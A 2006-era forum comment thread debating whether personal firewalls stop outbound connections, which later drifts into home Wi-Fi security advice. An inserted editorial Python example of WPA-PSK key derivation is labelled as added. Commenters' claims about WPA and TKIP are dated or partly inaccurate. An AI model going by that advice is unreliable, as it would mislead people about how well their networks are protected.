      Like writing "You will now get this and this dialog. This is normal, just hit ok." Or do their stuff indirectly through another application that is permitted to do the network operation. Or whatever. ...
      To summarize: That feature is a bad idea, because it requires that the malware author works with the system, not around. Thus, it easily instills a false sense of security, while providing very little real benefit.


      I think you misunderstood -- OS X prompts you the first time an application is run (or if it has been changed), it has nothing to do with the network. So if you didn't change it, why would you be looking at instructions on which buttons to click? And they can't do anything through another application, because the first application can't spawn the second until you've authorized it to run.

      So yes, it is beneficial, as long as people actually pay attention to it and don't blindly authorize anything that pops up. That hasn't been much of a problem in my experience, since OS X doesn't pop up nearly as many confirmation dialogs as Windows, and the users don't get desensitized to them.

      The outbound firewall most people use on OS X is Little Snitch, and while it is far and away better than most of the Zone Alarm/Norton stuff on windows, it is still vulnerable to simple circumvention like attaching the data to Safari.app or something like that. It is more intended to catch apps phoning home (hence the name) and that sort of thing, not actively malicious behavior.

      --
      Recursive: Adj. See Recursive.
    12. Re:Blocking outbound connections silly by EsbenMoseHansen · · Score: 1
      NO malware dialog can come up until the user gives OK to that warning

      True, however, the dialog would be quite common, and how would a non-tech savvy user know whether a fancy background changer (or whatever) needs an internet connection?

      Also, in order to install programs, a user is asked for an admin password. There is NO way any program can install or run without user input; at least I have not heard of one

      Sound and sober steps, which any decent OS takes. It is also rather irrelevant re firewalls :)

      As for the rest of the comments, I'm sure Mac is as secure as a proprietary system can be, and certainly, windows is reported to have many flaws. As I don't use either, I really don't want to give my opinion on that subject. My point was simply that inward facing firewalls (blocking outbound connections) are a silly invention, in my humble opinion.

      --
      Religion is regarded by the common people as true, by the wise as false, and by rulers as useful.
  13. Which software? by jtroutman · · Score: 2, Interesting

    I'm just curious, since the article doesn't mention it, but which firewalls were tested? I've looked at the website for the magazine that did the testing, but my German is rather rusty and I can't seem to find the original article. The only one mentioned in the article is the Windows XP firewall.

    --
    I stole this sig from a more creative user.
    1. Re:Which software? by emil10001 · · Score: 1

      I too was curious about this. It seems the audience is M$ users, so I wonder how the built-in Linux or BSD firewalls would fare.

    2. Re:Which software? by Lambticc · · Score: 5, Informative

      _G Data InternetSecurity 2006
      _F-Secure Internet Security 2006
      _Kaspersky Internet Security 6
      _Trend Micro PC-Cillin 14 Internet Security
      _Symantec Norton Internet Security 2006
      _Zonelabs Zonealarm Internet Security 2006
      _McAfee Internet Security Suite 2006
      _Computer Associates eTrust Internet Security Suite r2
      _Panda Platinum Internet Security 2006
      _Softwin Bitdefender 9 Internet Security

      This is all I could find from the German site PC Progressionell... my German is not so good.

    3. Re:Which software? by jtroutman · · Score: 1

      Thanks, I was wondering if they had tested ZoneAlarm. I use Pro and have to say that it has done a remarkable job of keeping out what I want out and keeping in what I want in. I'd be very interested to see an English translation or rewrite of the findings.

      --
      I stole this sig from a more creative user.
    4. Re:Which software? by AnalogDiehard · · Score: 1
      _G Data InternetSecurity 2006
      _F-Secure Internet Security 2006
      _Kaspersky Internet Security 6
      _Trend Micro PC-Cillin 14 Internet Security
      _Symantec Norton Internet Security 2006
      _Zonelabs Zonealarm Internet Security 2006
      _McAfee Internet Security Suite 2006
      _Computer Associates eTrust Internet Security Suite r2
      _Panda Platinum Internet Security 2006
      _Softwin Bitdefender 9 Internet Security

      No mention of Black Ice by Internet Security Systems. I asked our company admin what he recommended for a software firewall and Black Ice was his answer.

      I've been running Black Ice since 2002 and have had zero intrusions (I also run Mozilla with Javascript enabled). It even stopped MSBlaster in its tracks, and I told it to ignore it forever so it wouldn't nag me. I know a friend who is a very experienced "hacker" and he said Black Ice takes hours to break through. You can buy it at Staples for $40.

      --
      Eternity: will that be smoking, or non-smoking? I Corinthians 6:9-10
    5. Re:Which software? by enbody · · Score: 1

      They recommend updates which on Windows XP gets you a software firewall. They should have included that firewall in their evaluation.

  14. Purpose of a personal firewall by Anonymous Coward · · Score: 5, Insightful

    The personal or desktop firewall is not supposed to be your first line of defense, it's supposed to be your last line of defense.

    I recommend that people use both a hardware and software firewall, the hardware firewall protects you from the Internet in general. The software firewall protects you from the other computers on your local network.

    But when it comes down to it, a firewall is as strong as its weakest link, which is almost always the end user. Running as admin while browsing, downloading software from untrusted sources, don't blame the firewall for user stupidity.

    1. Re:Purpose of a personal firewall by Anonymous Coward · · Score: 0


      first line of defense is 220kV on your (metallic) keyboard? Which (2nd line of defense) activates a guillotine on keypress?
      </bofh>

    2. Re:Purpose of a personal firewall by Anonymous Coward · · Score: 0

      Keep in mind that it's not always user stupidity - there are plenty of Windows users who have to use specific and often special-purpose software that insists on running under an admin account, so the user is unfortunately left with little choice because of programmer stupidity.

  15. So sorry by voice_of_all_reason · · Score: 1

    Not one of the six firewall programs the magazine tested, regardless of whether commercial or freeware, could prevent all attempts from the test programs at establishing outgoing connections between the PC and the internet

    Yeah, what a drag that their software is not completely immaculate. Let us know when you code the world's first perfect application, sparky.

    And how exactly does "not perfect" translate to "useless" again?

    1. Re:So sorry by Hoi+Polloi · · Score: 1

      Since antibiotics don't cure all known diseases I say we get rid of them too.

      --
      It is by the juice of the coffee bean that thoughts acquire speed, the teeth acquire stains. The stains become a warning
  16. They just didn't have enough firewall. by Colin+Smith · · Score: 4, Funny

    Most of the "secured" computers I've seen have 3, 4 or more firewalls installed and "working". If one firewall isn't stopping outbound connections, go install another one, you'll be twice as secure then.

    --
    Deleted
    1. Re:They just didn't have enough firewall. by rcw-work · · Score: 1

      I hereby vow to refer to personal software firewalls as "cowbell".

  17. Little Snitch by GeffDE · · Score: 2, Informative

    The article (to my view) didn't mention any of the names of the programs, and I don't speak or read German, so I don't know how to find the names.

    But I would swear by a nifty little app (for mac), Little Snitch which does seem to block both outgoing and incoming traffic perfectly.

    --
    It has been a nervous year, with people beginning to feel like Christian Scientists with appendicitis.
    1. Re:Little Snitch by Steve+Ballmer's+Fat · · Score: 2, Informative

      I would second the notion that Little Snitch is fantastic! However, it should be pointed out that Snitch does NOT block incoming traffic, and it is not intended to.

    2. Re:Little Snitch by Anonymous Coward · · Score: 0

      Little Snitch only blocks outgoing traffic, and then you have to delete all the default rules to catch a lot of processes doing stuff you didn't know or need doing.

      Also Little Snitch has a habit of giving a program or process "blank access" to a particular port when you only gave it permission to contact a certain IP address.

      Some programs/processes use/mimic another program/process that already has this blank access.

      For instance if you give "curl" permission to the internet, another program or process can call this routine and make an internet connection.

      Still it's better than nothing.

    3. Re:Little Snitch by HTH+NE1 · · Score: 1

      Indeed, Little Snitch is wonderful. If only there were a version for other OSes other than Mac OS X.

      --
      Oh, say does that Star-Spangled Banner entwine / The myrtle of Venus with Bacchus's vine?
  18. duhhhh.... by WaterDamage · · Score: 1

    Most in the IT business have known this for years. Microsoft only makes the issue worse by fooling the general public into accepting that the firewall in Windows XP is sufficient to keep them safe. McAfee is one of the few players with a good personal firewall that manages to lock down the system pretty well but it's definitely too complex for the average user. There isn't much that can be done until the general population gets more educated as time goes on. In the meantime, it's job security for IT people.

    WORK HARD, millions on welfare are depending on you!

    1. Re:duhhhh.... by Akaihiryuu · · Score: 2, Interesting

      I used to work tech support for Verizon DSL (ick) and we saw problems with this all the time. People would have Mcafee installed and it would spontaneously decide to deny IE outbound access. (Now, customers using IE is a whole separate can of worms, but I don't feel like writing a novel so I won't go into that here...I "fixed" many computers by removing the IE shortcut from the desktop and installing Firefox.) The Mcafee issue happened frequently enough that I doubt it was something that the user misconfigured, some of the people didn't even know they had Mcafee (it came with the computer). The symptoms would be: you could ping anything you wanted, but any attempt at websurfing would time out, even to other devices on the LAN (like the cheap routers we supplied). I even saw times where Mcafee would deny access to the 192.168.x.x LAN address but allow general internet access. We didn't support firewalls when I worked there, so the customer was instructed to disable the firewall and then access came back. Trying to use a firewall to block *outbound* traffic is kind of dumb. If there's malicious software on your computer, it's already too late for more software to solve the problem.

    2. Re:duhhhh.... by budgenator · · Score: 1

      I didn't install the McAfee personal firewall, because of how much of a pain in the ass the McAfee AV has been since I installed it. What happened is the wife got a Dell pre-loaded with WinXP and of course there is one account with Admin privs. I finally talk her into letting me install a user account for me, and later the stepson. Well the stepson gets into the habit of picking up viruses so we decide to take away his admin privs, and everybody's admin privs so he didn't feel picked on. Well that was the start, it seems that when you have an account with admin privileges, windows in its weirding ways, locks it so only that user can access the files, this kinda sort of makes sense when the user has admin privs, because there may not be an actual admin account or there may be multiple admin accounts (how stupid is that). When you create an admin account and down-grade the user accounts to non-admin privs, admin can't access the user account's files, which doesn't seem so bad until you run across a site that says you need to update flash. Naturally you download to a convenient place, like your desktop, right click, run as admin then get a permission denied! The only way you can install is to change users to admin (which still can't get to user's files) re-download and install, which means that you have to wait 15 minutes to start because of all the pre-loaded, ET-phone home crapware that never should start in admin's account anyways! (I did have an epiphany, putting the download into a shared folder, and then try the run as) Why is McAfee a pain in the ass you ask, because in my situation McAfee can't install the updates it insists on downloading every time I log on to the computer. To keep McAfee updated, I have to boot, login as admin, logout, login as user to actually go from boot to usable, safe desktop take 20 - 30 minutes!

      Any windows gurus with ideas on how to fix this?

      --
      Apocalypse Cancelled, Sorry, No Ticket Refunds
    3. Re:duhhhh.... by smellsofbikes · · Score: 1

      I have a very similar symptom but in my case it's somewhere in the guts of my Qwest DSL modem. I can ping anywhere but sometimes, randomly, it'll stop resolving DNS *and* ip addresses, and I have to go cycle power on it. Stupid thing. What's kind of odd is that it happens about 6 hours to several days earlier on the Windows machine than on the 2 linux machines: they're still chugging along well after Windows starts saying it can't find google.com. (and sometimes if I'm really lucky it'll be able to find IP addresses but not be able to find names, so I've gotten good at memorizing big sites' ip addresses.)
      Stupid Qwest DSL modems.

      --
      Nostalgia's not what it used to be.
  19. Little Snitch for Mac OS X by toupsie · · Score: 3, Informative

    Mac users don't think you are safe because you aren't running windows. It's amazing the number of Apps that "phone home". A great tool for Mac OS X egress filtering is Little Snitch. It's cheap and easy to use.

    --
    Strange women lying in ponds distributing swords is no basis for a system of government.
  20. Bad article, no donut by Chairboy · · Score: 3, Informative

    The article makes a number of critical errors that impact its credibility.

    The article expounds on the dangers of Javascript, but fails to mention ActiveX. I suspect the author had heard about "scripting" being a security hole and assumed incorrectly that the other person was talking about Javascript. JS is inconsequential compared to ActiveX when it comes to actual risk.

    Additionally, when it claims that AV software essentially supersedes any firewall in terms of protection, it fails to consider the security nightmares in Windows. Specifically, through the trust relationships, you can modify registry settings and execute code on computers without your viral code ever touching the disk on the machine by doing it remotely from another computer. Because memory scanning is essentially ineffective, modern AV programs cannot effectively protect against this, which is why most security companies suggest combining AV with a Firewall. Plus, there are regular buffer overflow exploits that have the same effect: Code running without touching the disk. Where do they come from? Over the wire. Code Red and Nimda are good examples of attacks that were stopped by even the most basic firewalls. Safe browsing had no effect whatsoever on whether a user was infected.

    Finally, the article fails to take into consideration the thought that goes into the automatic rule creation most firewalls come with now. Developers understand that users demand convenience and security, and work to find a good match of both. To this effect, most modern desktop firewalls will use signature-based rules (so that a malicious program has to do more than just be named after a trusted program) to create a basic rule that allows that program outbound access. The ports are not being just "left open" willy-nilly; they are connected to known programs and watched. Some firewall programs even watch for threadjacking malware that would inject itself directly into trusted programs, which gives even more protection.

    The author of the article should reevaluate his or her knowledge of internet security. It is likely that the increasing ease of use has been interpreted as a drop in protection, but this is not the case. A secure system is one that uses a heterogeneous mix of disk and network protection.

    1. Re:Bad article, no donut by JimMelton · · Score: 1

      Well said.

  21. Result of Fundamental Flaw by JBHarris · · Score: 3, Insightful

    A fundamental concept in computing nowadays is that software designers attempt to do as much thinking for the end user as possible. This is a generally good thing, as the easier/more intuitive software is to use, the more people will use it. That point aside, this can be a negative thing as it keeps users from needing to understand what they are actually doing. Using computers NEEDS at least a basic understanding of what's going on.

    I don't mean everyone should study the TCP/IP stack and fully grasp ports and such, but seriously....you can't just show someone what a car does & explain the controls and then expect them to be able to drive properly & safely. It takes training & study.

    The same is true with computers. I'm not suggesting an 'internet license' or anything, but I would recommend that high school core classes at least provide the basics of the underlying fundamentals of computing. Until someone understands what those firewalls are for, they will never reach a truly useful state.

    Brad

  22. Question by geeber · · Score: 3, Interesting

    So if I have a hardware firewall in my router is a software firewall useful as a last ditch defense? Or is it nothing more than an annoyance and resource hog?

    1. Re:Question by legoburner · · Score: 4, Informative

      Although they do not provide much benefit, it can sometimes be worth it, especially if you have a wireless network behind your firewall. One rogue worm-ridden computer on your wireless network and bad things can happen to all your machines. Having a software firewall will consume resources and might annoy you from time to time, but will reduce the chance of infection from common worms. You should never presume your internal network is secure unless you can completely verify every last bit that comes into it.

    2. Re:Question by SCHecklerX · · Score: 5, Interesting

      Software firewalls 'solve' the same problem as antivirus software. They attempt to disallow stupid users from doing stupid things. For the most part, if people don't install unknown/untrusted software on their PCs, and use safer alternatives for online stuff (gaim, firefox, sylpheed vs. aol's own messenger, MSIE, Outlook) along with practicing safe online computing in general, personal firewalls add the same value as antivirus software. None.

      For a skilled user (which these aren't marketed to anyway), there is value in analyzing what your software is trying to open outbound connections to, if you tell your PFW to alert you. In the hands of a skilled user, this is good information and the PFW is a good tool to analyze what software you may want to ditch or restrict. Again, this isn't the demographic most PFW vendors market to. You can't use a tool like this without a basic knowledge of how TCP/IP works. Then again, maybe that should be required knowledge for any user who connects their computer to the Internet. We need licenses to show we are competent enough to drive cars, and this is the "Information Superhighway" after all.

    3. Re:Question by lotrtrotk · · Score: 1

      We need licenses to show we are competent enough to drive cars, and this is the "Information Superhighway" after all.

      Consider the 70-year-old who got his license back in 1950 and still drives. Surely, things have changed a lot from his day and realistically he wouldn't be able to pass a driver's test in 2006.

      Well, with the internet this will happen every single year. Having a license wouldn't mean anything.

    4. Re:Question by SCHecklerX · · Score: 2, Insightful

      The concepts involved (port/protocol/subnet/hostname/client/server, etc.) have not changed since I started playing around 1994. Yes, it will change when IPv6 is adopted, but we ALL have some learning to do when that occurs.

    5. Re:Question by Anonymous Coward · · Score: 0

      You can't risk breaking the computer hardware and software marketing and sales BS bubble.
      A computer is not and never will be a consumer device!
      To not know how it works at a better than average level is to be victimized by one's own ineptitude.

    6. Re:Question by 99BottlesOfBeerInMyF · · Score: 3, Insightful

      Software firewalls 'solve' the same problem as antivirus software. They attempt to disallow stupid users from doing stupid things.

      I disagree. Software firewalls on Windows attempt (and usually fail) to add granularity of control for end users.

      For the most part, if people don't install unknown/untrusted software on their PCs, and use safer alternatives for online stuff (gaim, firefox, sylpheed vs. aol's own messenger, MSIE, Outlook) along with practicing safe online computing in general, personal firewalls add the same value as antivirus software. None.

      This depends a whole lot upon your definition of "trusted." In any case, this is just another example of tools being designed without taking users into account. For most users the point of a computer is to run software they want. They don't know what software is secure and I'd argue no one does, as everyone has to trust others. I don't know if Firefox has a backdoor that will be enabled next week. I haven't audited all the code. I doubt you have either. Whether it is Firefox, some shareware, an executable some friend sent via IM, or just something the user thought was data but the extension was hidden on, users who don't run untrusted data are missing a huge portion of the functionality they want from their computer. More important yet, they expect that functionality. It is not that they are stupid; they just have reasonable expectations that are not being met.

      For example, most users never want any programs except their e-mail client to be able to read their e-mail address book. I mean, what kind of stupid machine would let "nekkid_pics.jpg(.exe)" read my friends' e-mail addresses and send a whole bunch of e-mail to them without asking me first? Who wants their computer to do that? And yet, almost all modern OS's just let any old program, or program disguised as data, do absolutely anything it wants without asking the user or even informing them. That is what is stupid.

      Then again, maybe that should be required knowledge for any user who connects their computer to the Internet. We need licenses to show we are competent enough to drive cars, and this is the "Information Superhighway" after all.

      If I drive poorly, a bunch of kids could get run down and killed by a ton of metal. If I run random executables someone might get spam e-mail. Perhaps you see how the negative consequences of the former warrant licensing while the latter almost certainly does not?

      The real problems are twofold. One, computers are very poorly designed and don't behave as users expect. Two, when computers don't meet people's fairly reasonable expectations and instead are hijacked by spammers, people like you blame the users instead of the crappy OS's. Fix the software first, then if the problem persists you can blame the users.

    7. Re:Question by laray88 · · Score: 1

      I am not that much concerned with what is coming in. I have a router/firewall for that. I like to know what is going out and to where, and for that a PFW is valuable.

    8. Re:Question by atokata · · Score: 1

      Because driver's licenses have been so effective in not allowing stupid people to injure others using their cars? And, because federal regulations *always* fix problems? ;-)

    9. Re:Question by Anonymous Coward · · Score: 0

      Then again, maybe that should be required knowledge for any user who connects their computer to the Internet. We need licenses to show we are competent enough to drive cars, and this is the "Information Superhighway" after all.

      I'm sorry, but am I the only person who disagrees with this opinion? There are different kinds of computer users, and most people don't want to have to learn all about networking, security, firewalls etc. Yes, there are some that do, but we are not a majority. Wouldn't it be nice if the OS didn't need a million and one security applications running all the time to stop it doing what it shouldn't be able to do anyway?

      Besides, the computer ignorant act as easy pickings for crackers, malware, viruses etc. so that they don't try and work out how to break into computers that are "secured" by the more techno-savvy, acting as a handy meat-shield. If a "computing license" was required then the crackers would be forced to actually become hackers rather than the current batches of script-kiddies. Computer ignorant users give us computer ignorant crackers. Is that such a bad thing?
    10. Re:Question by Alarash · · Score: 1

      I would suggest one of the SOHO products from Fortinet. They are firewall/IPS/IDS. That is, not only do they provide the basic routing and firewall protection (NAT, (D)DoS protection, etc.), but they will also scan inbound and outbound traffic for viruses, malware, spyware and spam. The dangerous data is blocked before it reaches your computer, and that is good.

    11. Re:Question by Cutting_Crew · · Score: 1

      I have McAfee Personal Firewall and VirusScan for my software firewall. I also have a Linksys hardware firewall so I can have a wireless network. The McAfee software firewall and VirusScan are set to update automatically, and I have the firewall alert me when applications and other software are attempting to access the internet to and from my computer. I have it set up to give me an option as to whether I want to grant access only once or forever and whether I want to limit the access to just inbound or outbound or both.

      I have the Linksys router that is my hardware firewall that I have set up as secured; that is, the person trying to connect to it has to have the 10-digit key, but also their MAC address has to be listed in allowable computers to have access to the net. The other night I got a warning that a computer with MAC address "whatever" was trying to access the network and should I allow it. Obviously I clicked "NO", but I don't know if someone somehow got the 10-digit key or I don't know how this works. What would cause this prompt? Does someone have to have the key before it checks the MAC address?

      Anyway, this is my setup, so tell me if this is enough? Thanks!

    12. Re:Question by evil_Tak · · Score: 1

      A trained monkey could pass a driver's test in 2006.
      I passed one on the highway this morning.
      He was actually doing better than most of the other drivers, as he wasn't applying mascara, talking on the phone, and smoking.

    13. Re:Question by thePowerOfGrayskull · · Score: 1

      I am not 100% sure, but I believe that they will need to have cracked the key before checking WAN -- because to crack the key, they need only to 'eavesdrop' on the frequency, and not make any active connection to it.

      Allowing only authorized MACs to connect is great, though not perfect because these can be spoofed. Having your wireless router using a key is a good idea, but you'll want to use WPA-PSK for encryption instead of WEP. A quick Google search gave me this article which -- in spite of the source -- actually does an OK job of explaining. If you're running Windows, and your card & router support it, the article will be sufficient to get that set up.

      WPA-PSK can be tricky to set up on Linux, if you're running any Linux workstations wirelessly; the only way I've been able to do it with my Broadcom card is via ndiswrapper and wpa_supplicant. If you're using a wireless Linux desktop, some research will be required to find out how to configure this for your distro.

    14. Re:Question by evil_Tak · · Score: 1

      I don't know if Firefox has a backdoor that will be enabled next week. I haven't audited all the code. I doubt you have either.

      No, I haven't. Fortunately for us, there are thousands of people auditing the code at any given moment.
      I have audited the Gaim code, however. I can assure you that there is no backdoor.

    15. Re:Question by 99BottlesOfBeerInMyF · · Score: 1

      No, I haven't. Fortunately for us, there are thousands of people auditing the code at any given moment.

      And I can trust that all of them will look at the relevant code and are competent and honest?

      I have audited the Gaim code, however. I can assure you that there is no backdoor.

      I see. evil_Tak says it is good, so I should trust it eh? None of us know all the code we are running is trustable and will continue to be so as we update it. We all want to run code in which we have differing levels of trust. Not recognizing that in OS design is a problem.

    16. Re:Question by joto · · Score: 1

      Because driver's licenses have been so effective in not allowing stupid people to injure others using their cars?

      Well, yes. I think you'd find it pretty hard to argue otherwise.

      And, because federal regulations *always* fix problems? ;-)

      Well, not always. But usually. And that should be enough incentive to be in favour of laws. If something must always work better for you to consider it, there isn't a single invention good enough for you to use. So you'd better start running around naked in the woods, or realize that worst case scenario is not a good metric for everyday life...

      However, I will agree that in this particular case, regulation is probably not a good idea. Demanding that computer users need a "license" to use their computers, makes about as much sense as demanding that hammer users need a "license" to use a hammer (for most people, the hammer is even more dangerous). Unless we are willing to punish people for mismanaging their computers (e.g. getting "owned" becomes a punishable offence), demanding that they have a license makes little sense.

    17. Re:Question by Malc · · Score: 1

      Not just wireless networks. If you VPN to your office, then a software firewall might help there. Our corporate LAN used to be badly infested, to the point we had to bring up new machines behind a consumer-grade router (Linksys unit) just so that we could download and install the latest Microsoft patches without being infected.

    18. Re:Question by 99BottlesOfBeerInMyF · · Score: 1

      It takes ONE guy to find a malicious backdoor in an OSS program and the backdoor will be fixed and the responsible lynched.

      Yeah because servers and dev machines are never compromised and because user accounts are never hijacked. It has happened before and will probably happen again.

      Under NDAs and similar stuff, point to me one guy who'll risk his head exposing such a thing in a commercial firewall.

      Umm, this is an argument in favor of my point, not against it. We need to be able to run code we don't trust without a huge hassle and without giving it complete access to do anything it wants on our machines.

    19. Re:Question by evil_Tak · · Score: 1

      If the project is good enough for you to want to use, I'd say you're confirming that its developers are competent. With respect to honesty, it only takes one honest auditor to flush out any wrongdoing, but it takes 100% dishonest auditors to cover it up.

      I have the luxury of not running any code I don't trust. I sympathize that you don't have this luxury.

    20. Re:Question by 99BottlesOfBeerInMyF · · Score: 1

      If the project is good enough for you to want to use, I'd say you're confirming that its developers are competent.

      I usually try before I buy. It just means I want to run it, perhaps to evaluate, perhaps because I need to open those files in a weird format, perhaps because I think it's the greatest thing ever.

      With respect to honesty, it only takes one honest auditor to flush out any wrongdoing, but it takes 100% dishonest auditors to cover it up.

      Much code is never audited and much software is only available as closed-source binaries. Who is to say an auditor will recognize a backdoor even if they see it?

      I have the luxury of not running any code I don't trust. I sympathize that you don't have this luxury.

      I can cope. I have VMs and IDS software. I'm fairly competent.

      Many users, however, often don't even realize that they are running code at all. They think they're opening a picture or a movie. They just want to play a game. Look at the most popular software packages on Windows. How many of them do you trust to not phone home, or overwrite something? Most users who get a foo.exe in their mailbox think, "hmm, I should run this martian blasting game that speeds up my internet." The OS should let them double click on any old thing without automatically trusting their entire machine and all personal data on it to the author of each of these binaries.

    21. Re:Question by Cutting_Crew · · Score: 1

      I just looked at my router settings. I have a Linksys and WPA-PSK isn't an option. WPA and WPA Personal & Enterprise are some of the other options. I am not sure if this is better than WEP or not. Any suggestions?

    22. Re:Question by Anonymous Coward · · Score: 0

      Oh boy, if you are counting on your nforce4 motherboard to protect you, you are already a zombie.

    23. Re:Question by SanityInAnarchy · · Score: 1

      Source? Is there some specific vulnerability I should be concerned about?

      But no, I don't count on that. I also count on common sense.

      --
      Don't thank God, thank a doctor!
    24. Re:Question by thePowerOfGrayskull · · Score: 1

      Damn. I had a whole thing written up, then I closed the wrong window. Quick answer: I believe that on a consumer device like that router, WPA implies WPA-PSK. If you have the option of entering a password on the router -- after you've selected WPA -- then it's WPA-PSK. (PSK is "pre-shared key"; the password is that key, stored on the router and on anything connecting to it.)

      Just make sure not to use a dictionary word, and the longer your phrase is the better (over 8 characters, max of 64; using > 8 makes sure it will get converted to a hash, IIRC). You'll also want to change it regularly (maybe 1 time a month or so).
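
The passphrase-versus-key point made above (8 to 63 characters are hashed, 64 hex digits are the key itself) is the WPA-PSK key derivation from IEEE 802.11i: PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, 4096 iterations, 256-bit output. The following is an added example, not code from any commenter or from Linksys; the function names are hypothetical and the known-answer vector ("password"/"IEEE") is the first test case published in the standard's annex.

```python
"""WPA/WPA2 Personal (WPA-PSK) key handling, as a defender would check it.

A router's "WPA Shared Key" field accepts either:
  * a passphrase of 8..63 printable ASCII characters, which is stretched
    into the 256-bit pairwise master key with PBKDF2-HMAC-SHA1 (4096
    iterations, SSID as salt), or
  * exactly 64 hexadecimal digits, which ARE the 256-bit key and are used
    as-is (no hashing).
Because the SSID is the salt, the same passphrase on two differently named
networks yields two different keys.
Added example; function names are hypothetical.
"""
import hashlib
import string

PBKDF2_ITERATIONS = 4096   # fixed by the 802.11i specification
PSK_BYTES = 32             # 256-bit pairwise master key
MAX_SSID_BYTES = 32        # 802.11 SSID length limit


def classify_wpa_key(key: str) -> str:
    """Return 'raw-hex', 'passphrase' or 'invalid' for a WPA Personal key field."""
    if len(key) == 64 and all(c in string.hexdigits for c in key):
        return "raw-hex"
    # Printable ASCII is 0x20..0x7E; length 8..63 is mandated by the standard.
    if 8 <= len(key) <= 63 and all(0x20 <= ord(c) <= 0x7E for c in key):
        return "passphrase"
    return "invalid"


def derive_psk(key: str, ssid: str) -> bytes:
    """Compute the 32-byte PSK that the router and every client actually install.

    Raises ValueError for a key the router would reject, so a configuration
    checker fails loudly instead of silently installing a weak or wrong key.
    """
    ssid_bytes = ssid.encode("utf-8")
    if not 0 < len(ssid_bytes) <= MAX_SSID_BYTES:
        raise ValueError("SSID must be 1..32 bytes")
    kind = classify_wpa_key(key)
    if kind == "raw-hex":
        return bytes.fromhex(key)
    if kind == "passphrase":
        return hashlib.pbkdf2_hmac(
            "sha1", key.encode("ascii"), ssid_bytes, PBKDF2_ITERATIONS, PSK_BYTES
        )
    raise ValueError("WPA key must be 8..63 printable ASCII chars or 64 hex digits")


def psk_hex(key: str, ssid: str) -> str:
    """Hex form of the derived PSK, as shown in wpa_supplicant.conf 'psk=' lines."""
    return derive_psk(key, ssid).hex()


if __name__ == "__main__":
    # Known-answer test from IEEE Std 802.11i, Annex H.4.1, test case 1.
    print(psk_hex("password", "IEEE"))
    # Same passphrase, different SSID: a different key, because SSID is the salt.
    print(psk_hex("password", "IEEE") != psk_hex("password", "IEEE-Guest"))
```

The 64-hex-digit form is what the router stores after you type a passphrase, which is why a client can be configured with either one and still join.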

    25. Re:Question by evil_Tak · · Score: 1

      Some OSs do that. ;-)

    26. Re:Question by 99BottlesOfBeerInMyF · · Score: 1

      Yeah, to some degree. SELinux is the closest I've seen to a usable desktop/workstation, but the defaults for it need to be seriously customized. I really hope someone builds the UI components necessary to bring this to the masses, but I'm sure not counting on Microsoft to do it.

    27. Re:Question by Cutting_Crew · · Score: 1

      OK, should I choose WPA Personal/Enterprise or WPA2 Personal/Enterprise?
      Also, it does ask for a "Passphrase" but then also allows me to assign 10-digit keys. Should I use this in addition to a passphrase? Do I need a passphrase? What is MAXIMUM protection? Thanks, Grayskull!

    28. Re:Question by Cutting_Crew · · Score: 1

      EDIT Grayskull: when I click on WPA Personal it asks for 2 different algorithms, TKIP and AES, then a WPA Shared Key text box (what's this?) and a time in seconds for Key Group Renewal. Default is 3600. WPA Enterprise asked for RADIUS server address and RADIUS port etc., but neither offers a passphrase like WEP does.
      Maybe I should stick with WEP and have a passphrase + 10-digit key + MAC address filter?

    29. Re:Question by thePowerOfGrayskull · · Score: 1

      Unfortunately, you've passed beyond the limit of what I'm familiar with. Offhand, it sounds like you probably want WPA Personal, choose TKIP, and the "WPA Shared Key" is the "PSK" part of it -- that's the passphrase you need to enter on the device, and in Windows in order to connect to your network.

      If at all an option, I would definitely say do NOT stick with WEP -- a quick search shows many, many howtos and tools available for breaking that encryption quickly and easily. MAC address filter is definitely good to have regardless, but it won't stop people from 'eavesdropping' on your data if they break the encryption.

    30. Re:Question by Cutting_Crew · · Score: 1

      What do you mean by eavesdropping? No one is allowed to look at any of my folders. That option is unavailable.

    31. Re:Question by thePowerOfGrayskull · · Score: 1

      Using their wireless equipment to scan what's being sent over yours. Once they have determined your key, they can do that without joining your network -- so MAC blocking won't prevent it. Basically it provides a wide-open door to anyone snooping your network.

    32. Re:Question by Cutting_Crew · · Score: 1

      OK then... so what's the 100% way to keep people out, or is this unavoidable? And I am assuming it would take someone at least somewhat hacker-knowledgeable to be able to do what you just described? More talk about this and we might need to exchange IMs :)

    33. Re:Question by Cutting_Crew · · Score: 1

      OK then... so what's the 100% way to keep people out, or is this unavoidable? And I am assuming it would take someone at least somewhat hacker-knowledgeable to be able to do what you just described? More talk about this and we might need to exchange IMs :)

      I guess I am confused. If you need a key + your computer has a MAC address, then yeah, they can spoof the key all day long, but if their computer's MAC address isn't allowed in my list in my router settings, then how could they get through?

    34. Re:Question by thePowerOfGrayskull · · Score: 1

      Like I said before, use the WPA option. That's the best one, since it changes its encryption algorithm dynamically, making it much harder to break. Changing the passkey every month or so should make it reasonably safe.

      There are two reasons that approved MAC addresses by themselves aren't sufficient. First, a MAC address can also be easily spoofed. So if someone is monitoring traffic, they pick up your valid MAC address, then use it themselves. (I'm oversimplifying a little, but that's the basic scenario.) Second, while it may help deter someone from actively using your connection, it won't do anything to prevent monitoring of traffic going across your wireless network -- so sensitive or personal information could be picked up. Again, this is less likely a concern, but it is possible.

  23. Which Six? by 140Mandak262Jamuna · · Score: 3, Informative

    Could not find the list of the six software tested. Don't know if Zone Alarm was tested and found to be defective too. But I would be surprised. Every time I update Firefox, Zone Alarm knows that the exe file has changed and alerts me to renew permission for it to connect to the internet.

    --
    sed -e 's/Chuck Norris/Rajnikant/g' joke > fact
    1. Re:Which Six? by dvice_null · · Score: 1

      One of the most common problems I see in Firefox help forums is related to a firewall blocking Firefox after an update. Sometimes the problem is that the firewall didn't even ask for a new permission nor tell the user that the software was blocked. And sometimes it could be a user who presses the wrong button, without understanding what it means.

    2. Re:Which Six? by Sigg3.net · · Score: 0

      Remove the wrong button, problem solved.

  24. Useful in their own right by Anonymous Coward · · Score: 1, Interesting

    FTFA: Users who still prefer a firewall should first check whether they are using a router with firewall functionality. If so, then no firewall is needed, including the one built in to Windows XP, reports PC Professionell. As far as I'm concerned, the main purpose of using personal firewalls is to prevent unwanted outbound connections, for example from Microsoft products. Hardware routers only block incoming traffic, and can't do it on a per-program basis. The article is too quick to dismiss personal firewalls for not being every man's savior.

    1. Re:Useful in their own right by rs232 · · Score: 1

      "Hardware routers only block incoming traffic"

      I don't see why not; a firewall is a customized router with rules that block by source address/port. If you don't want people surfing, block outgoing on port 80. Of course it's going to be difficult figuring out what is or is not legitimate traffic coming out of a Windows box, as it has to open numerous high ports in order to function.

